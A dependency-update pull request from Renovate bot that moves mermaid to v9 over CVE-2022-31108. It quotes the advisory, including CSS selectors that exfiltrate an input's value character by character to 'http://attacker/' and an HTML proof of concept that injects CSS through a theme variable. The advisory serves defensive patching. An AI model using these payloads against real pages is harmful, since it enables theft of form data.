Skip to content
This repository was archived by the owner on Jan 16, 2025. It is now read-only.

patch: Update dependency mermaid to v9 [SECURITY]#1617

Open
renovate[bot] wants to merge 1 commit into
masterfrom
renovate/npm-mermaid-vulnerability
Open

patch: Update dependency mermaid to v9 [SECURITY]#1617
renovate[bot] wants to merge 1 commit into
masterfrom
renovate/npm-mermaid-vulnerability

Conversation

@renovate

@renovate renovate Bot commented Jul 5, 2022

Copy link
Copy Markdown
Contributor

Mend Renovate

This PR contains the following updates:

Package Change Age Adoption Passing Confidence
mermaid ^8.13.9 -> ^9.0.0 age adoption passing confidence

GitHub Vulnerability Alerts

CVE-2022-31108

An attacker is able to inject arbitrary CSS into the generated graph allowing them to change the styling of elements outside of the generated graph, and potentially exfiltrate sensitive information by using specially crafted CSS selectors.

The following example shows how an attacker can exfiltrate the contents of an input field by bruteforcing the value attribute one character at a time. Whenever there is an actual match, an http request will be made by the browser in order to "load" a background image that will let an attacker know what's the value of the character.

input[name=secret][value^=g] { background-image: url(http://attacker/?char=g); }
...
input[name=secret][value^=go] { background-image: url(http://attacker/?char=o); }
...
input[name=secret][value^=goo] { background-image: url(http://attacker/?char=o); }
...
input[name=secret][value^=goos] { background-image: url(http://attacker/?char=s); }
...
input[name=secret][value^=goose] { background-image: url(http://attacker/?char=e); }

Patches

Has the problem been patched? What versions should users upgrade to?

Workarounds

Is there a way for users to fix or remediate the vulnerability without upgrading?

References

Are there any links users can visit to find out more?

For more information

If you have any questions or comments about this advisory:

Product

mermaid.js

Tested Version

v9.1.1

Details

Issue 1: Multiple CSS Injection (GHSL-2022-036)

By supplying a carefully crafted textColor theme variable, an attacker can inject arbitrary CSS rules into the document. In the following snippet we can see that getStyles does not sanitize any of the theme variables leaving the door open for CSS injection.

Snippet from src/styles.js:

const getStyles = (type, userStyles, options) => {
  return ` {
    font-family: ${options.fontFamily};
    font-size: ${options.fontSize};
    fill: ${options.textColor}
  }

For example, if we set textColor to "green;} #target { background-color: crimson }" the resulting CSS will contain a new selector #target that will apply a crimson background color to an arbitrary element.

<html>

<body>
    <div id="target">
        <h1>This element does not belong to the SVG but we can style it</h1>
    </div>
    <svg id="diagram">
    </svg>

    <script src="https://cdn.jsdelivr.net/npm/mermaid/dist/mermaid.min.js"></script>
    <script>
        mermaid.initialize({ startOnLoad: false });

        const graph =
            `
            %%{ init: { "themeVariables" : { "textColor": "green;} #target { background-color: crimson }" } } }%%
            graph TD
                A[Goose]
            `

        const diagram = document.getElementById("diagram")
        const svg = mermaid.render('diagram-svg', graph)
        diagram.innerHTML = svg
    </script>
</body>

</html>

In the proof of concept above we used the textColor variable to inject CSS, but there are multiple functions that can potentially be abused to change the style of the document. Some of them are in the following list but we encourage mantainers to look for additional injection points:

Impact

This issue may lead to Information Disclosure via CSS selectors and functions able to generate HTTP requests. This also allows an attacker to change the document in ways which may lead a user to perform unintended actions, such as clicking on a link, etc.

Remediation

Ensure that user input is adequately escaped before embedding it in CSS blocks.


Release Notes

knsv/mermaid

v9.1.2

Compare Source

Release Notes

🚀 Features

Bug Fixes & Cleanup

Documentation

Dependecy updates

🎉 Thanks to all contributors helping with this release! 🎉

v9.1.1

Compare Source

Release Notes

🎉 Thanks to all contributors helping with this release! 🎉

v9.1.0

Compare Source

Release Notes

🚀 Features

Documentation

Dependecy updates

🎉 Thanks to all contributors helping with this release! 🎉

v9.0.1

Compare Source

Release Notes

🐛 Bug Fixes

  • Removal of vulnerability (#​2958) @​knsv
  • Fix broken re-rendering of gitGraph in Mermaid Live Editor

🎉 Thanks to all contributors helping with this release! 🎉

v9.0.0

Compare Source

Release Notes

Main feature

Moving the gitGraph from experimental alpha status to a fully supported diagram type which handles theming and directives. The grammar has changed slightly from the alpha version, and no longer supports reset operations and some internal fast-forwarding has been removed for simplicity. Some few GitGraphs based on the alpha version might break with the update. This is the reason for the major version number update.

We now support:

  • Commit types
  • Multiple branches in sperate lanes
  • Theming

Other changes:

Documentation updates

Dependency updates

🎉 Thanks to all contributors helping with this release! 🎉


Configuration

📅 Schedule: Branch creation - "" (UTC), Automerge - At any time (no schedule defined).

🚦 Automerge: Disabled by config. Please merge this manually once you are satisfied.

Rebasing: Whenever PR becomes conflicted, or you tick the rebase/retry checkbox.

🔕 Ignore: Close this PR and you won't be reminded about this update again.


  • If you want to rebase/retry this PR, click this checkbox.

This PR has been generated by Mend Renovate. View repository job log here.

@renovate renovate Bot added the dependencies label Jul 5, 2022
@renovate renovate Bot force-pushed the renovate/npm-mermaid-vulnerability branch from 4442cc1 to da468c9 Compare July 5, 2022 19:49
@renovate renovate Bot changed the title patch: Update dependency mermaid to ^8.14.0 [SECURITY] patch: Update dependency mermaid to v9 [SECURITY] Jul 5, 2022
@renovate renovate Bot force-pushed the renovate/npm-mermaid-vulnerability branch from da468c9 to 2c550d5 Compare July 6, 2022 06:23
@renovate renovate Bot changed the title patch: Update dependency mermaid to v9 [SECURITY] patch: Update dependency mermaid to ^8.14.0 [SECURITY] Jul 6, 2022
@renovate renovate Bot force-pushed the renovate/npm-mermaid-vulnerability branch from 2c550d5 to 4bfefc1 Compare July 6, 2022 06:28
@renovate renovate Bot changed the title patch: Update dependency mermaid to ^8.14.0 [SECURITY] patch: Update dependency mermaid to v9 [SECURITY] Jul 6, 2022
@renovate renovate Bot force-pushed the renovate/npm-mermaid-vulnerability branch from 4bfefc1 to 69127a5 Compare July 11, 2022 18:47
@renovate renovate Bot changed the title patch: Update dependency mermaid to v9 [SECURITY] patch: Update dependency mermaid to ^8.14.0 [SECURITY] Jul 11, 2022
@renovate renovate Bot force-pushed the renovate/npm-mermaid-vulnerability branch 2 times, most recently from dba73df to 8045d93 Compare July 11, 2022 20:12
@renovate renovate Bot changed the title patch: Update dependency mermaid to ^8.14.0 [SECURITY] patch: Update dependency mermaid to v9 [SECURITY] Jul 11, 2022
@renovate renovate Bot force-pushed the renovate/npm-mermaid-vulnerability branch from 8045d93 to 674f205 Compare July 16, 2022 13:11
@renovate renovate Bot changed the title patch: Update dependency mermaid to v9 [SECURITY] patch: Update dependency mermaid to ^8.14.0 [SECURITY] Jul 16, 2022
@renovate renovate Bot force-pushed the renovate/npm-mermaid-vulnerability branch from 674f205 to cf42f9e Compare July 16, 2022 13:16
@renovate renovate Bot changed the title patch: Update dependency mermaid to ^8.14.0 [SECURITY] patch: Update dependency mermaid to v9 [SECURITY] Jul 16, 2022
@renovate renovate Bot force-pushed the renovate/npm-mermaid-vulnerability branch from cf42f9e to 1a8febe Compare July 21, 2022 04:59
@renovate renovate Bot changed the title patch: Update dependency mermaid to v9 [SECURITY] patch: Update dependency mermaid to ^8.14.0 [SECURITY] Jul 21, 2022
@renovate renovate Bot force-pushed the renovate/npm-mermaid-vulnerability branch from 1a8febe to 724e331 Compare July 21, 2022 05:03
@renovate renovate Bot changed the title patch: Update dependency mermaid to ^8.14.0 [SECURITY] patch: Update dependency mermaid to v9 [SECURITY] Jul 21, 2022
@renovate renovate Bot force-pushed the renovate/npm-mermaid-vulnerability branch from 724e331 to 76e4fcc Compare July 24, 2022 09:48
@renovate renovate Bot changed the title patch: Update dependency mermaid to v9 [SECURITY] patch: Update dependency mermaid to ^8.14.0 [SECURITY] Jul 24, 2022
@renovate renovate Bot force-pushed the renovate/npm-mermaid-vulnerability branch from 76e4fcc to 34a143d Compare July 24, 2022 09:52
@renovate renovate Bot changed the title patch: Update dependency mermaid to ^8.14.0 [SECURITY] patch: Update dependency mermaid to v9 [SECURITY] Jul 24, 2022
@renovate renovate Bot force-pushed the renovate/npm-mermaid-vulnerability branch from 34a143d to 19670c8 Compare July 28, 2022 14:16
@renovate renovate Bot changed the title patch: Update dependency mermaid to v9 [SECURITY] patch: Update dependency mermaid to ^8.14.0 [SECURITY] Jul 28, 2022
@renovate renovate Bot force-pushed the renovate/npm-mermaid-vulnerability branch from 19670c8 to 35929d8 Compare July 28, 2022 14:25
@renovate renovate Bot changed the title patch: Update dependency mermaid to ^8.14.0 [SECURITY] patch: Update dependency mermaid to v9 [SECURITY] Jul 28, 2022
@renovate renovate Bot force-pushed the renovate/npm-mermaid-vulnerability branch from 35929d8 to 929d703 Compare August 1, 2022 06:50
@renovate renovate Bot changed the title patch: Update dependency mermaid to v9 [SECURITY] patch: Update dependency mermaid to ^8.14.0 [SECURITY] Aug 1, 2022
@renovate renovate Bot changed the title patch: Update dependency mermaid to v9 [SECURITY] patch: Update dependency mermaid to ^8.14.0 [SECURITY] Aug 22, 2022
@renovate renovate Bot force-pushed the renovate/npm-mermaid-vulnerability branch from 780ef38 to e78bdcb Compare August 22, 2022 15:05
@renovate renovate Bot changed the title patch: Update dependency mermaid to ^8.14.0 [SECURITY] patch: Update dependency mermaid to v9 [SECURITY] Aug 22, 2022
@renovate renovate Bot force-pushed the renovate/npm-mermaid-vulnerability branch from e78bdcb to 9f9ee13 Compare August 30, 2022 11:35
@renovate renovate Bot changed the title patch: Update dependency mermaid to v9 [SECURITY] patch: Update dependency mermaid to ^8.14.0 [SECURITY] Aug 30, 2022
@renovate renovate Bot force-pushed the renovate/npm-mermaid-vulnerability branch from 9f9ee13 to 331eb25 Compare August 30, 2022 11:39
@renovate renovate Bot changed the title patch: Update dependency mermaid to ^8.14.0 [SECURITY] patch: Update dependency mermaid to v9 [SECURITY] Aug 30, 2022
@renovate renovate Bot force-pushed the renovate/npm-mermaid-vulnerability branch from 331eb25 to ddc14cf Compare September 1, 2022 10:52
@renovate renovate Bot changed the title patch: Update dependency mermaid to v9 [SECURITY] patch: Update dependency mermaid to ^8.14.0 [SECURITY] Sep 1, 2022
@renovate renovate Bot force-pushed the renovate/npm-mermaid-vulnerability branch from ddc14cf to 85adbc9 Compare September 1, 2022 10:56
@renovate renovate Bot changed the title patch: Update dependency mermaid to ^8.14.0 [SECURITY] patch: Update dependency mermaid to v9 [SECURITY] Sep 1, 2022
@renovate renovate Bot force-pushed the renovate/npm-mermaid-vulnerability branch from 85adbc9 to d21b4ed Compare September 2, 2022 05:21
@renovate renovate Bot changed the title patch: Update dependency mermaid to v9 [SECURITY] patch: Update dependency mermaid to ^8.14.0 [SECURITY] Sep 2, 2022
@renovate renovate Bot force-pushed the renovate/npm-mermaid-vulnerability branch from d21b4ed to c60aa14 Compare September 2, 2022 05:25
@renovate renovate Bot changed the title patch: Update dependency mermaid to ^8.14.0 [SECURITY] patch: Update dependency mermaid to v9 [SECURITY] Sep 2, 2022
@renovate renovate Bot changed the title patch: Update dependency mermaid to v9 [SECURITY] patch: Update dependency mermaid to ^8.14.0 [SECURITY] Sep 6, 2022
@renovate renovate Bot force-pushed the renovate/npm-mermaid-vulnerability branch 2 times, most recently from 7c7e95d to 25f02a7 Compare September 6, 2022 09:50
@renovate renovate Bot changed the title patch: Update dependency mermaid to ^8.14.0 [SECURITY] patch: Update dependency mermaid to v9 [SECURITY] Sep 6, 2022
@renovate renovate Bot force-pushed the renovate/npm-mermaid-vulnerability branch from 25f02a7 to 581abd2 Compare September 7, 2022 16:53
@renovate renovate Bot changed the title patch: Update dependency mermaid to v9 [SECURITY] patch: Update dependency mermaid to ^8.14.0 [SECURITY] Sep 7, 2022
@renovate renovate Bot force-pushed the renovate/npm-mermaid-vulnerability branch from 581abd2 to 13253ff Compare September 7, 2022 16:58
@renovate renovate Bot changed the title patch: Update dependency mermaid to ^8.14.0 [SECURITY] patch: Update dependency mermaid to v9 [SECURITY] Sep 7, 2022
@renovate renovate Bot force-pushed the renovate/npm-mermaid-vulnerability branch from 13253ff to 93dc890 Compare September 12, 2022 12:46
@renovate renovate Bot changed the title patch: Update dependency mermaid to v9 [SECURITY] patch: Update dependency mermaid to ^8.14.0 [SECURITY] Sep 12, 2022
@renovate renovate Bot force-pushed the renovate/npm-mermaid-vulnerability branch from 93dc890 to 93fc585 Compare September 12, 2022 12:50
@renovate renovate Bot changed the title patch: Update dependency mermaid to ^8.14.0 [SECURITY] patch: Update dependency mermaid to v9 [SECURITY] Sep 12, 2022
@renovate renovate Bot force-pushed the renovate/npm-mermaid-vulnerability branch from 93fc585 to b671f12 Compare September 14, 2022 20:36
@renovate renovate Bot changed the title patch: Update dependency mermaid to v9 [SECURITY] patch: Update dependency mermaid to ^8.14.0 [SECURITY] Sep 14, 2022
Update mermaid from 8.14.0 to 9.1.2

Change-type: patch
Sign up for free to subscribe to this conversation on GitHub. Already have an account? Sign in.

Projects

None yet

Development

Successfully merging this pull request may close these issues.

0 participants